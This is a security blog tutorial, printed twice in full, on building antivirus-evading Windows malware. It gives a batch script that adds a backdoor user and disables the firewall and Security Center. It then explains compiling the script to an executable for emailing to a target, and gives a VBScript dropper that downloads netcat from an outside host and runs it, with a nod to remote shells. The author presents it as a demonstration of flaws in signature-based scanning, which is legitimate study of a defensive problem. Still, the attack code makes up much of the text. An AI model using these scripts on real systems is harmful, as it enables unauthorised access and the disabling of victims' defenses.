This article will demonstrate how an average PC user can create a piece of malicious software in minutes that will be undetected by all the major anti-malware scanning engines.
This article is for informational purposes only and the author disclaims any responsibility for your use or misuse of any of the information contained herein.
It is well-known in blackhat circles that a new piece of malware, coded from scratch, will almost always bypass signature-based malware scanners. What is less known is that the skill needed to do this is minimal at best - an average user with no programming experience can cut and paste a few lines of code together and create a undetected malicious executable in 3 easy steps.
Most anti-virus scanners rely on a database of signatures for known viruses. Once a new virus is spread wide enough that it has been identified as malicious, the anti-virus vendors scramble to come up with a fingerprint to identify that strain of malware in the future. The obvious flaw in this process is that a new piece of malware will bypass the scanners by default, until it is widespread enough to be noticed by security researchers or picked up by a dummy node. There is always a window of opportunity for new malware between the time of deployment and the update of the signature databases and as recent malware trends demonstrate, this window is large enough to make a profit for the authors.
Roll-your-own undetected malware in 3 easy steps!
Step 1: Commands to execute
Here we compile the DOS commands that our malware will execute into a DOS batch file. As a simple proof of concept, let’s add a new user, disable the XP firewall, and create a directory on the C drive.
@echo off
net user hacksafe hacksafe /add
net stop “Security Center”
net stop SharedAccess
netsh firewall set opmode mode=disable
mkdir c:\haxed
Save the above as a filename.bat
Step 2: Compile to an executable
Experienced DOS users may remember a number of utilities that were able to convert a batch file into an executable (com or exe). These tools basically wrap a shell call around each of our commands and bundle the whole thing up into a tiny .exe file. One of the most well known is BAT2EXEC released by PC Magazine in 1990.
creating our malware
Our tiny executable COM file is ready to go.
Step 3: Test and Deploy
We now have a custom executable that runs some obvoiusly malicious commands: disabling the firewall and adding a new user. If we were to email this file to a target, surely any modern anti-virus scanner would pick this up as a simple batch file and alert us to the malicious code… right?
virus scan1
virus scan2
virus scan3
No patterns exist for this new piece of malware - it’s unrecognised by signature-based scanners. Heuristics and sandboxing may alert to suspicious activity, or email filtering may prevent our executable from reaching the target, but the primary mechanism of anti-malware protection has been defeated in a matter of seconds with little knowledge or skill on the part of the attacker. If the target user were to run our executable, the only indication of malicious activity would be a command prompt quickly appearing and disappearing on the desktop.
Step 4 (Optional):
A typical malware author would take the created executable and mangle it in various ways to make it harder to detect - using tools such as encrypters, packers, scramblers and EXE binders. The malicious code may be bundled with a legitimate executable, or packed with a rootkit or other remote access utility. For more information on how malware authors avoid detection, check out our article on packers and scramblers.
Example: Creating a simple dropper
A dropper is a small piece of malware designed to “drop” another peice of malware onto a system. It usually comes in the form of a simple executable that, when executed, retrieves a file from a hardcoded web or ftp site and executes it (usually a rootkit or botnet suite).
As a proof of concept, we can create a simple dropper using VBscript in a batch file that pulls down a copy of netcat from the Hacksafe site and executes it:
echo Dim DataBin >hacksafe.vbs
echo Dim HTTPGET >>hacksafe.vbs
echo Set HTTPGET = CreateObject(”Microsoft.XMLHTTP”) >>hacksafe.vbs
echo HTTPGET.Open “GET”, “http://www.hacksafe.com.au/nc.exe“, False>>hacksafe.vbs
echo HTTPGET.Send >>hacksafe.vbs
echo DataBin = HTTPGET.ResponseBody >>hacksafe.vbs
echo Const adTypeBinary=1 >>hacksafe.vbs
echo Const adSaveCreateOverWrite=2 >>hacksafe.vbs
echo Dim test1 >>hacksafe.vbs
echo Set test1 = CreateObject(”ADODB.Stream”) >>hacksafe.vbs
echo test1.Type = adTypeBinary >>hacksafe.vbs
echo test1.Open >>hacksafe.vbs
echo test1.Write DataBin >>hacksafe.vbs
echo test1.SaveToFile “malware.exe”, adSaveCreateOverWrite >>hacksafe.vbs
hacksafe.vbs
malware.exe -h
We compile using one of the many bat conversion utilities - Bat-to-Exe Converter 1.1. (This utility packs the output file using UPX, which may cause some anti-virus scanners to flag the file as potentially suspicious).
bat2exe dropper
After creating our simple dropper.exe we submit it for scan:
dropper scanned for malware
Nothing found. It would be trivial to include the firewall disable command from the previous example and configure a netcat command line to listen on an incoming port and spawn a command shell. A new, undetected yet incredibly simple and obvious, remote access trojan!
It is hoped that this article serves to demonstrate the fundamental flaw of signature-based malware detection systems.
Some additional points to consider:
*
A .COM file under 64kb can be renamed to an .EXE (or .scr, or .lnk, etc) and will still execute.
*
Heuristics and behaviour analysis may detect malicious activity.
*
The examples above assume XP sp2 and the user has local admin privileges.
*
Many bat2exe utilities use a packer or scrambler that is recognised by signatures.
*
Anyone with programming experience can see that the above can be achieved using execve(), system().
*
This is old, old news. People were hacking BBS’s using BAT2EXE in the early 90’s!
Batch to EXE Convertors
BAT2EXE - http://www.computerhope.com/dutil.htm
Batch2EXE Convertor - http://www.softpedia.com/get/System/File-Management/Batch-To-Exe-Converter.shtml
Bat2COM - http://www.techpronow.com/modules/mydownloads/singlefile.php?cid=2&lid=15
ExeScript - http://www.surfpack.com/downloads/ExeScript/21361.html
Online Virus Scanning
VirusTotal - http://www.virustotal.com/
Jotti’s Malware Scan - http://virusscan.jotti.org/
Kaspersky - http://www.kaspersky.com/scanforvirus
Thanks for reading! We welcome your feedback and comments!
(And no, we will not help you with your new 0day worm or virus, so please don’t ask!)
This article is for informational purposes only and the author disclaims any responsibility for your use or misuse of any of the information contained herein.
It is well-known in blackhat circles that a new piece of malware, coded from scratch, will almost always bypass signature-based malware scanners. What is less known is that the skill needed to do this is minimal at best - an average user with no programming experience can cut and paste a few lines of code together and create a undetected malicious executable in 3 easy steps.
Most anti-virus scanners rely on a database of signatures for known viruses. Once a new virus is spread wide enough that it has been identified as malicious, the anti-virus vendors scramble to come up with a fingerprint to identify that strain of malware in the future. The obvious flaw in this process is that a new piece of malware will bypass the scanners by default, until it is widespread enough to be noticed by security researchers or picked up by a dummy node. There is always a window of opportunity for new malware between the time of deployment and the update of the signature databases and as recent malware trends demonstrate, this window is large enough to make a profit for the authors.
Roll-your-own undetected malware in 3 easy steps!
Step 1: Commands to execute
Here we compile the DOS commands that our malware will execute into a DOS batch file. As a simple proof of concept, let’s add a new user, disable the XP firewall, and create a directory on the C drive.
@echo off
net user hacksafe hacksafe /add
net stop “Security Center”
net stop SharedAccess
netsh firewall set opmode mode=disable
mkdir c:\haxed
Save the above as a filename.bat
Step 2: Compile to an executable
Experienced DOS users may remember a number of utilities that were able to convert a batch file into an executable (com or exe). These tools basically wrap a shell call around each of our commands and bundle the whole thing up into a tiny .exe file. One of the most well known is BAT2EXEC released by PC Magazine in 1990.
creating our malware
Our tiny executable COM file is ready to go.
Step 3: Test and Deploy
We now have a custom executable that runs some obvoiusly malicious commands: disabling the firewall and adding a new user. If we were to email this file to a target, surely any modern anti-virus scanner would pick this up as a simple batch file and alert us to the malicious code… right?
virus scan1
virus scan2
virus scan3
No patterns exist for this new piece of malware - it’s unrecognised by signature-based scanners. Heuristics and sandboxing may alert to suspicious activity, or email filtering may prevent our executable from reaching the target, but the primary mechanism of anti-malware protection has been defeated in a matter of seconds with little knowledge or skill on the part of the attacker. If the target user were to run our executable, the only indication of malicious activity would be a command prompt quickly appearing and disappearing on the desktop.
Step 4 (Optional):
A typical malware author would take the created executable and mangle it in various ways to make it harder to detect - using tools such as encrypters, packers, scramblers and EXE binders. The malicious code may be bundled with a legitimate executable, or packed with a rootkit or other remote access utility. For more information on how malware authors avoid detection, check out our article on packers and scramblers.
Example: Creating a simple dropper
A dropper is a small piece of malware designed to “drop” another peice of malware onto a system. It usually comes in the form of a simple executable that, when executed, retrieves a file from a hardcoded web or ftp site and executes it (usually a rootkit or botnet suite).
As a proof of concept, we can create a simple dropper using VBscript in a batch file that pulls down a copy of netcat from the Hacksafe site and executes it:
echo Dim DataBin >hacksafe.vbs
echo Dim HTTPGET >>hacksafe.vbs
echo Set HTTPGET = CreateObject(”Microsoft.XMLHTTP”) >>hacksafe.vbs
echo HTTPGET.Open “GET”, “http://www.hacksafe.com.au/nc.exe“, False>>hacksafe.vbs
echo HTTPGET.Send >>hacksafe.vbs
echo DataBin = HTTPGET.ResponseBody >>hacksafe.vbs
echo Const adTypeBinary=1 >>hacksafe.vbs
echo Const adSaveCreateOverWrite=2 >>hacksafe.vbs
echo Dim test1 >>hacksafe.vbs
echo Set test1 = CreateObject(”ADODB.Stream”) >>hacksafe.vbs
echo test1.Type = adTypeBinary >>hacksafe.vbs
echo test1.Open >>hacksafe.vbs
echo test1.Write DataBin >>hacksafe.vbs
echo test1.SaveToFile “malware.exe”, adSaveCreateOverWrite >>hacksafe.vbs
hacksafe.vbs
malware.exe -h
We compile using one of the many bat conversion utilities - Bat-to-Exe Converter 1.1. (This utility packs the output file using UPX, which may cause some anti-virus scanners to flag the file as potentially suspicious).
bat2exe dropper
After creating our simple dropper.exe we submit it for scan:
dropper scanned for malware
Nothing found. It would be trivial to include the firewall disable command from the previous example and configure a netcat command line to listen on an incoming port and spawn a command shell. A new, undetected yet incredibly simple and obvious, remote access trojan!
It is hoped that this article serves to demonstrate the fundamental flaw of signature-based malware detection systems.
Some additional points to consider:
*
A .COM file under 64kb can be renamed to an .EXE (or .scr, or .lnk, etc) and will still execute.
*
Heuristics and behaviour analysis may detect malicious activity.
*
The examples above assume XP sp2 and the user has local admin privileges.
*
Many bat2exe utilities use a packer or scrambler that is recognised by signatures.
*
Anyone with programming experience can see that the above can be achieved using execve(), system().
*
This is old, old news. People were hacking BBS’s using BAT2EXE in the early 90’s!
Batch to EXE Convertors
BAT2EXE - http://www.computerhope.com/dutil.htm
Batch2EXE Convertor - http://www.softpedia.com/get/System/File-Management/Batch-To-Exe-Converter.shtml
Bat2COM - http://www.techpronow.com/modules/mydownloads/singlefile.php?cid=2&lid=15
ExeScript - http://www.surfpack.com/downloads/ExeScript/21361.html
Online Virus Scanning
VirusTotal - http://www.virustotal.com/
Jotti’s Malware Scan - http://virusscan.jotti.org/
Kaspersky - http://www.kaspersky.com/scanforvirus
Thanks for reading! We welcome your feedback and comments!
(And no, we will not help you with your new 0day worm or virus, so please don’t ask!)